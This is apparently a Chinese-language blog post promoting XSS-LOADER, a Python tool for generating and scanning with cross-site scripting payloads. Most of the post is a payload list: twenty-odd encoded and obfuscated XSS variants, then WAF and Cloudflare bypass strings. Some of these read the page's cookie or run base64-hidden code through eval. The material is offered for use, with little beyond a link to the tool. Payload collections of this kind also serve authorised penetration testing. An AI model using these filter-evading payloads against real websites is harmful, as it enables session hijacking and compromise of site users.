最近好像一直在鸽,主要是实验室最近有点忙,项目忙不过来,给各位观众老爷说声抱歉。今天介绍的是一款xss工具。XSS-LOADER
工具由python3编写,功能强大,我们来看一下他的一些使用方法:
比如我们选择BASIC PAYLOAD
他会让我们接下来选择编码的方式:
大约支持下面这些编码方式
* | 1. UPPER CASE----> <SCRIPT>ALERT(1)</SCRIPT>
* | 2. UPPER AND LOWER CASE----> <ScRiPt>aleRt(1)</ScRiPt>
* | 3. URL ENCODE -----> %3Cscript%3Ealert%281%29%3C%2Fscript%3E
* | 4. HTML ENTITY ENCODE-----> <script>alert(1)</script>
* | 5. SPLIT PAYLOAD -----> <scri</script>pt>>alert(1)</scri</script>pt>>
* | 6. HEX ENCODE -----> 3c7363726970743e616c6572742831293c2f7363726970743e
* | 7. UTF-16 ENCODE -----> Encode payload to utf-16 format.
* | 8. UTF-32 ENCODE-----> Encode payload to utf-32 format.
* | 9. DELETE TAG -----> ";alert('XSS');//
* | 10. UNICODE ENCODE-----> %uff1cscript%uff1ealert(1)%uff1c/script%uff1e
* | 11. US-ASCII ENCODE -----> ¼script¾alert(1)¼/script¾
* | 12. BASE64 ENCODE -----> PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
* | 13. UTF-7 ENCODE -----> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
* | 14. PARENTHESIS BYPASS -----> <script>alert`1`</script>
* | 15. UTF-8 ENCODE -----> %C0%BCscript%C0%BEalert%CA%B91)%C0%BC/script%C0%BE
* | 16. TAG BLOCK BREAKOUT-----> "><script>alert(1)</script>
* | 17. SCRIPT BREAKOUT-----> </script><script>alert(1)</script>
* | 18. FILE UPLOAD PAYLOAD-----> "><script>alert(1)</script>.gif
* | 19. INSIDE COMMENTS BYPASS-----> <!--><script>alert(1)</script>-->
* | 20. MUTATION PAYLOAD-----> <noscript><p title="</noscript><script>alert(1)</script>">
* | 21. MALFORMED IMG-----> <IMG """><script>alert(1)</script>">
* | 22. SPACE BYPASS-----> <img^Lsrc=x^Lonerror=alert('1');>
* | 23. DOWNLEVEL-HIDDEN BLOCK-----> <!--[if gte IE 4]><script>alert(1)</script><![endif]-->
* | 24. WAF BYPASS PAYLOADS-----> Show Waf Bypass Payload List
* | 25. CLOUDFLARE BYPASS PAYLOADS-----> Show Cloudflare Bypass Payload
我们可以看一下他的wafbypass:
就是一些内置的bypass语句,当然还有专门waf的bypass,也就是cf:
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
<svg/onload=alert()//
<a href="j	a	v	asc
ri	pt:(a	l	e	r	t	(document.domain))">X</a>
<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;>
<svg%0Aonauxclick=0;[1].some(confirm)//
<a"/onclick=(confirm)()>click
<a href="j	a	v	asc
ri	pt:(a	l	e	r	t	(document.domain))">X</a>
<sVg/oNloAd=”JaVaScRiPt:/**\/*\’/”\eval(atob(‘Y29uZmlybShkb2N1bWVudC5kb21haW4pOw==’))”>
<iframe src=jaVaScrIpT:eval(atob(‘Y29uZmlybShkb2N1bWVudC5kb21haW4pOw==’))>
<a href=”j	a	v	asc
ri	pt:\u0061\u006C\u0065\u0072\u0074(this[‘document’][‘cookie’])”>X</a>
<iframe src=”%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)”>
%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)
%253%63svg%2520onload=alert(1)%253%65
<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;>
<select><noembed></select><script x=’a@b’a>y=’a@b’//a@b%0a\u0061lert(1)</script x>
<a+HREF=’%26%237javascrip%26%239t:alert%26lpar;document.domain)’>
当然也可以输入自己的payload。
除了上面的功能还有xss扫描功能:
也支持批量扫描...
工具地址:
https://github.com/capture0x/XSS-LOADER/